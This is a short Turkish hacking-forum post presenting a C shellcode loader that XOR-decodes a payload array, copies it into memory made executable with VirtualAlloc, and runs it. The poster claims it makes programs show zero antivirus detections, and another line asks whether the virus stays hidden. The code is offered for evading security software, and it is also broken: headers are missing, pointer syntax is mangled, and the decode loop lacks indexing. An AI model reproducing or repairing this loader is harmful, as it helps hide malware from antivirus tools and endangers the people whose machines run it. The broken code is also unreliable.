burakoagagamer2
Silver Üye
- Katılım
- 15 Tem 2022
- Mesajlar
- 95
- Beğeniler
- 1
Bu kodları Program İcerisine Ekledigimizde 0 Virus Göstermektedir
#include
#include
int main(int argc, char argv) {
char b[] = {/ your XORd with key of x shellcode goes here i.e. 0x4C,0x4F, 0x4C /};
char c[sizeof b];
for (int i = 0; i < sizeof b; i++) {c = b ^ x;}
void exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(exec, c, sizeof c);
((void()())exec)();
kanka bu kodları yazınca virüs gözükmüyormu